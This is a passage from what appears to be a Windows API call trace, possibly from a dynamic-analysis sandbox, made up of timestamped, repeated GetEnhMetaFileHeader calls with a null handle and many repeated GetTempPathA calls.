GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, 